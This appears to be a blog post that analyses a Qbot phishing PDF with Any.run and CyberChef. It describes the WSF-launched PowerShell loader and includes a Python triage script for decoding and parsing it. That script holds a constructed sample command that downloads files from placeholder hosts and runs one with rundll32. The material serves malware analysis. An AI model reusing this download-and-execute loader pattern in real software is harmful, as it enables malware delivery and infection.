Analyzing Malware using FREE Online Tools

I came across an interesting PDF today which I would like to analyze for you. However, I decided to do something a little different today and do the analysis only using free online tools.
Although this method might not be as technically exhaustive as analyzing the malware on a dedicated VM for malware analysis or in a disassembler, sometimes you might not have access to all your fancy tools and might need to do quick and dirty analysis to investigate some malicious document.

Let’s start with Any.run. As we can see, the file is a standard phishing template PDF that instructs the victim to “click on the button” to download additional files. It masquerades as a document containing protected files.

After clicking the “OPEN” button on the PDF, the archive (.zip file in the screenshot) gets downloaded. When we extract the contents of the archive we are left with the IP-August.14.wsf (Windows Script File).
A Windows Script File (WSF) is a file format used to create script files that can be executed on Windows operating systems. WSF files are written using scripting languages such as VBScript or JScript, and are saved with a .wsf file extension.
WSF files can be executed from the command line, from a batch file, or from within another script file. They can also be scheduled to run automatically using the Windows Task Scheduler. WSF files are also commonly used to automate tasks or perform administrative functions on Windows systems. They can be used to perform a wide range of tasks, such as system maintenance, file management, and network administration.

However, in our case, the WSF seems to be running another PowerShell script.

Powershell.exe is used to run an encoded command. Let's move over to CyberChef to decode the payload and get a better understanding of what is going on.


After Base64-decoding the payload we can already make out the script. Let’s try to make it prettier and get rid of those unprintable characters.

Again we use CyberChef for this task. More specifically, I decoded the previous output as UTF-16LE (code page 1200), which is how PowerShell expects an encoded command to be stored. From here we get our malicious PowerShell script.

Let’s try to make sense of this:
- The script uses the `Start-Sleep` cmdlet to pause execution for 2 seconds.
- It defines an array variable named `$samplings` which contains a list of URLs separated by commas. These URLs seem to point to files with the ".dat" extension.
- It uses a `foreach` loop to iterate over each URL in the `$samplings` array.
- Inside the loop, it uses the `wget` command (in PowerShell an alias for `Invoke-WebRequest`) to download the file from the current URL to the `$env:TEMP\ObelisedHitlerian.reconsultSurgiest` file path. It specifies a 16-second timeout for the download.
- If the downloaded file is greater than or equal to 100,000 bytes in size, it starts the `rundll32` command with the `$env:TEMP\ObelisedHitlerian.reconsultSurgiest,Nikn` argument (i.e. it loads the downloaded file as a DLL and calls its `Nikn` export) and breaks out of the loop.
- If the download fails, it waits for 2 seconds before trying the next URL in the `$samplings` array.
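The two CyberChef steps above (Base64, then UTF-16LE) and the loader traits just listed can be reproduced offline for triage. The following Python is an added example, not code from the post; the sample script, its hosts, file name and export name are constructed placeholders, not the real indicators.

```python
import base64
import re

# Constructed sample shaped like the loader the post describes (Start-Sleep, a $samplings
# array of .dat URLs, foreach/wget with a timeout, a size check, then rundll32). Hosts,
# file names and the export name are placeholders, not the real indicators.
SAMPLE_SCRIPT = (
    "Start-Sleep -Seconds 2; "
    "$samplings = 'http://host-a.invalid/x.dat','http://host-b.invalid/y.dat'; "
    "foreach ($u in $samplings) { wget $u -OutFile $env:TEMP\\stage.dat -TimeoutSec 16; "
    "if ((Get-Item $env:TEMP\\stage.dat).Length -ge 100000) { "
    "rundll32 $env:TEMP\\stage.dat,FakeExport; break }; Start-Sleep -Seconds 2 }"
)

def encode_powershell_command(script: str) -> str:
    """Build the -EncodedCommand form (UTF-16LE, then Base64); used here only to make the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_powershell_command(encoded: str) -> str:
    """Undo the two CyberChef steps from the post: Base64 decode, then decode as UTF-16LE (1200)."""
    raw = base64.b64decode(encoded)
    if len(raw) % 2:  # a UTF-16LE blob always has an even byte count
        raise ValueError("not UTF-16LE; the payload was probably encoded some other way")
    return raw.decode("utf-16-le")

def defang(url: str) -> str:
    """Write a URL the way the IOC list does: dots in the host become [.] so it is not clickable."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme}://{host.replace('.', '[.]')}{slash}{path}"

def triage(script: str) -> dict:
    """Pull out the loader traits the post walks through: download URLs, sleep and timeout
    values, the size threshold, and the rundll32 target with its export name."""
    urls = re.findall(r"https?://[^\s'\"<>]+", script)
    sleep = re.search(r"Start-Sleep(?:\s+-s\w*)?\s+(\d+)", script, re.IGNORECASE)
    timeout = re.search(r"-TimeoutSec\s+(\d+)", script, re.IGNORECASE)
    size = re.search(r"-ge\s+(\d+)", script, re.IGNORECASE)
    rundll = re.search(r"rundll32(?:\.exe)?\s+(\S+?),(\w+)", script, re.IGNORECASE)
    return {
        "urls": [defang(u) for u in urls],
        "sleep_seconds": int(sleep.group(1)) if sleep else None,
        "timeout_seconds": int(timeout.group(1)) if timeout else None,
        "min_size_bytes": int(size.group(1)) if size else None,
        "rundll32_target": rundll.group(1) if rundll else None,
        "rundll32_export": rundll.group(2) if rundll else None,
    }
```

Feeding a real `-EncodedCommand` string to `decode_powershell_command` and then `triage` gives the defanged URL list and the rundll32 export in one step, which is what you want to note before detonating anything in a sandbox.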

Now that we have a good idea of what to expect, we can copy the decoded PowerShell payload, go back to Any.run and run it!

Running the payload results in just what we expected. Additional .dat files are downloaded.

And voilà! Any.run already has a detection for it and identifies the malware as Qbot!

QBot (also known as Qakbot) is a type of malware that is designed to steal sensitive information from infected systems. It is typically spread through phishing emails that contain a malicious attachment or a link to a fake website that downloads the malware. Once installed on a system, QBot is able to steal passwords, financial data, and other sensitive information. It can also be used to deploy additional malware, such as ransomware or banking trojans.
QBot is known for its ability to evade detection and persist on infected systems, making it difficult to remove. It uses advanced techniques to avoid detection by antivirus software, including encrypting its code, using rootkit functionality, and manipulating system files and processes.
QBot has been a persistent threat since it first appeared in 2009, and has undergone several iterations over the years. It is primarily targeted at businesses and organizations, and has been responsible for several high-profile data breaches. To protect against QBot and other types of malware, it is important to use up-to-date antivirus software, practice safe browsing habits, and be cautious when opening email attachments or clicking on links from unknown senders.
Happy Hacking!
IOCs